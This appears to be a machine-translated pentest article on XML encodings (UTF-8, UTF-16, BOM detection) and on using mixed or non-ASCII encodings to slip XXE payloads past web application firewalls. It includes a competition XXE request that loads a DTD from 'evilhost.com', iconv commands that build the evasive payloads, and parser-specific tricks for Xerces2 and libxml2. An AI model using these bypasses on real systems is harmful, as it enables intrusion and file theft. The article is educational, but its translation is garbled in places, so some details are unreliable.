WAFs see white noise instead of a document!
00000000 | 3C3F 786D 6C20 7665 7273 696F 6E3D 2231 | <? xml version = "1 |
00000010 | 2E30 2220 656E 636F 6469 6E67 3D22 5554 | .0 "encoding =" UT |
00000020 | 462D 3136 4245 2200 3F00 3E00 3C00 6100 | F-16BE ".?.>. <. A. |
00000030 | 3E00 3100 3300 3300 3700 3C00 2F00 6100 | > .1.3.3.7. <./. A. |
00000040 | 3E | > |
The article contains a short story about encoding in XML and about bypassing WAFs with their help.
What encodings work in XML
The specification requires parsers to understand two encodings: UTF-8 and UTF-16. Parsers support more, but these will be enough to attack.
UTF-8 and UTF-16 display the same characters
from the Unicode table .
The difference between encodings is how they store the character number.
')
UTF-8One character - from one to four bytes.
The character code is stored in a pattern:
Number of bytes | Significant bits | Binary code |
one | 7 | 0xxxxxxx |
2 | eleven | 110xxxxx 10xxxxxx |
3 | sixteen | 1110xxxx 10xxxxxx 10xxxxxx |
four | 21 | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx |
It is impossible to encode characters. The shortest way is correct.
UTF-16One character - two or four bytes.
The character code is stored in a pattern:
Number of bytes | Significant bits | Binary code |
2 | sixteen | xxxxxxxx xxxxxxxx |
four * | 20 | 110110xx xxxxxxxx 110111xx xxxxxxxx |
* 0x010000 is deducted from the codeWriting a character with 4 bytes is called a
surrogate pair . The pair consists of two common characters, but from the reserved range: from U + D800 to U + DFFF. The halves of the pair are not valid by themselves.
UTF-16 is of two kinds: UTF-16BE and UTF-16LE (big-endian / little-endian). They have a different byte order.
Big-endian is a “natural” byte order, as in Arabic numerals.
Little-endian - reverse order bytes.
Examples of writing characters in UTF-16BE and UTF-16LEEncoding | Symbol | Binary code |
UTF-16BE | U + 003F | 00000000 00111111 |
UTF-16LE | U + 003F | 00111111 00000000 |
UTF-16BE * | U + 1D6E5 | 110110 00 00110101 110111 10 1100101 |
UTF-16LE * | U + 1D6E5 | 00110101 110110 00 11100101 110111 10 |
* In four-byte characters, groups of 2 bytes are flipped separately. This is done for backward compatibility with Unicode 1.0, where all characters consisted of only two bytes.How parsers define encoding
Parsers define encoding in four ways:
External encoding informationSome network protocols have a special field for encoding:
WebDav Encoding TransmissionMost often, these are protocols that are built according to the MIME standard: for example, SMTP, HTTP, and WebDAV.
Byte Order Mark (BOM)BOM - a symbol with the code U + FEFF.
If the parser finds it at the beginning, it will determine the encoding according to how it is written.
Popular encodings and their BOMEncoding | Bom | Example | |
UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ... <? xml |
UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C | ... <.?. xml |
UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 | .. <.?. xml |
BOM works only at the beginning of the document. In the middle, it is read as a special space or causes an error.
By the first characters of the documentThe specification allows the parser to look at the first four bytes and determine the encoding for them:
Encoding | Document start | |
UTF-8 ISO 646 ASCII | 3C 3F 78 6D | <? xm |
UTF-16BE | 00 3C 00 3F | . <.? |
UTF-16LE | 3C 00 3F 00 | <.? |
This only works for documents that start with an XML declaration.
From the XML declarationThe encoding can be specified in the XML declaration:
<?xml version="1.0" encoding="UTF-8"?>
An XML declaration is a string that is written at the very beginning. According to it, the parser understands the format of the document.
<?xml version="1.0" encoding="ISO-8859-1" ?> <très>là </très>
The document is encoded ISO-8859-1To read the declaration, the parser, apparently, should already know the encoding. But the declaration is useful for clarifying between similar encodings: for example, compatible with ASCII.
Standard WAF bypass
The easiest option is to change the encoding to incompatible with ASCII and hope that WAF will not understand it.
This method worked on
the WAF Bypass competition in 2015. There, participants were required to read the flag through the XXE vulnerability:
Request for XXE operation from the competition POST / HTTP/1.1 Host: d3rr0r1m.waf-bypass.phdays.com Connection: close Content-Type: text/xml User-Agent: Mozilla/5.0 Content-Length: 166 <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd"> %xxe; ]> <root> <method>test</method> </root>
One solution is to transcode the request body into UTF-16BE without a BOM:
cat original.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml
In this document, WAF saw no danger and missed the request.
Bypass using two encodings
Another way to confuse WAF is to encode XML in two encodings at once.
When the parser reads the encoding from the declaration, it immediately switches to it. Even if it is incompatible with the encoding in which the declaration itself is recorded.
If you create a document and declaration in different encodings, then WAFs will not understand anything.
Xerces2 java parserThe declaration is in ASCII, then UTF-16BE:
00000000 | 3C3F 786D 6C20 7665 7273 696F 6E3D 2231 | <? xml version = "1 |
00000010 | 2E30 2220 656E 636F 6469 6E67 3D22 5554 | .0 "encoding =" UT |
00000020 | 462D 3136 4245 223F 3E00 3C00 6100 3E00 | F-16BE "?>. <. A.>. |
00000030 | 3100 3300 3300 3700 3C00 2F00 6100 3E | 1.3.3.7. <./. A.> |
Teams to form:
echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml echo '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
libxml2libxml2 switches the encoding as soon as the attribute reads. Therefore, we change the encoding before closing the declaration:
00000000 | 3C3F 786D 6C20 7665 7273 696F 6E3D 2231 | <? xml version = "1 |
00000010 | 2E30 2220 656E 636F 6469 6E67 3D22 5554 | .0 "encoding =" UT |
00000020 | 462D 3136 4245 2200 3F00 3E00 3C00 6100 | F-16BE ".?.>. <. A. |
00000030 | 3E00 3100 3300 3300 3700 3C00 2F00 6100 | > .1.3.3.7. <./. A. |
00000040 | 3E | > |
Teams to form:
echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml echo '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
Successful pentest!